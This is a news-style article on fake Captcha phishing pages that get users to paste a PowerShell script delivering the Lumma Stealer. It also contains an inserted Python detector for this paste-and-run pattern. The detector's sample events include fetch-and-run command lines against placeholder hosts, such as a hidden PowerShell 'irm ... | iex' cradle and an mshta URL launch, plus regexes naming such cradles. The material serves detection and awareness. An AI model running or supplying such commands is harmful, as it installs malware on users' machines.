An alarming increase in malware distribution attempts through fake Captcha campaigns has caught the attention of cybersecurity experts, with over 1.4 million users falling victim to these malicious activities in the past month.
The primary payload in these campaigns is the Lumma Stealer malware, a tool built for data theft. Cybercriminals use phishing emails, such as a recent impersonation of the GitHub Security Team, to lure unsuspecting users to websites hosting the fake Captcha pages.
Once users click the links in these phishing emails, they are taken to fake Captcha screens that deceive them into copying a malicious script to their clipboard. Following the on-screen instructions, typically to paste it into the Win+R Run prompt or a command line, executes the script and installs malware on the user’s system, putting their personal information and system security at risk.
At the core of these attacks is a malicious PowerShell script, which the fake Captcha page places on the clipboard through a JavaScript-enabled button. Once executed, the script connects to a remote command-and-control server to download either the Lumma Stealer malware or an intermediary loader that ultimately drops the stealer onto the victim’s system.
The objective of the script is to steal sensitive information from the compromised machine. It downloads a secondary PowerShell script from a GitHub repository, which communicates with a command-and-control server to retrieve the final Lumma Stealer payload disguised as a legitimate application named SysSetup.exe. Upon execution, this payload may leave user data and system functions vulnerable to security breaches.
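As an added defender-side example (not from the original report), the following Python flags the launch lineage this technique produces: a script host started by explorer.exe, as a Win+R paste is, whose command line also carries a download cradle or a hidden-window flag. The event fields follow Sysmon process-creation records; the sample events, hosts and URLs are constructed placeholders, not indicators from the campaign.

```python
import json
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields); paths and URLs are placeholders.
SAMPLE_EVENTS = [
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"CommandLine": "powershell -w hidden -c \"irm http://example.invalid/stage2.ps1 | iex\""}',
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", '
    r'"CommandLine": "mshta http://example.invalid/verify.hta"}',
    r'{"ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '
    r'"CommandLine": "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\Patch\\inventory.ps1"}',
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", '
    r'"CommandLine": "notepad C:\\Users\\a\\notes.txt"}',
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# One-line download cradles that fetch remote content and run it, as the pasted script does.
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|mshta\s+https?://)", re.I)
# Flags that hide the console from the person who just pasted the command.
EVASION = re.compile(r"-(w|win|windowstyle)\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|-noni\b", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: dict) -> list[str]:
    """Return the reasons an event matches the paste-and-run pattern; empty list if it does not."""
    if basename(ev.get("Image", "")) not in SCRIPT_HOSTS:
        return []
    reasons = []
    interactive = basename(ev.get("ParentImage", "")) == "explorer.exe"
    if interactive:
        reasons.append("script host spawned by explorer.exe (Run dialog / Win+R lineage)")
    cmd = ev.get("CommandLine", "")
    if CRADLE.search(cmd):
        reasons.append("remote download cradle in command line")
    if EVASION.search(cmd):
        reasons.append("hidden-window or encoded-command flag")
    # Alert only when the interactive lineage is combined with at least one content indicator,
    # so a service-launched admin script or a plain Run-dialog launch does not fire.
    return reasons if interactive and len(reasons) >= 2 else []

def detect(lines) -> list[dict]:
    """Run classify() over JSON-lines records and collect the matching ones."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        reasons = classify(ev)
        if reasons:
            findings.append({"command_line": ev["CommandLine"], "reasons": reasons})
    return findings
```

Run against real Sysmon or Security 4688 exports by feeding each record as a JSON line with the same three field names; the two constructed paste-and-run events are flagged and the two benign ones are not.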
Recent data has shown a significant increase in fake Captcha campaigns, with countries like Italy, Argentina, France, Spain, and Brazil being hit the hardest. Millions of unique users worldwide have been targeted by these attacks over the past four weeks, underscoring the global impact of these malicious activities and the urgent need for effective countermeasures.
The Indicators of Compromise (IoCs) provided shed light on the modus operandi of the malicious campaign using a GitHub-based command-and-control server and a PowerShell script to deploy the Lumma Stealer malware. To stay protected against such threats, experts advise users to be cautious of unsolicited emails, avoid executing unknown scripts, enable two-factor authentication, and use reputable antivirus solutions to detect and prevent malware infections.
As the threat of fake Captcha attacks continues to grow, it is crucial for individuals and organizations to stay vigilant and implement robust cybersecurity measures to safeguard their data and systems from malicious actors.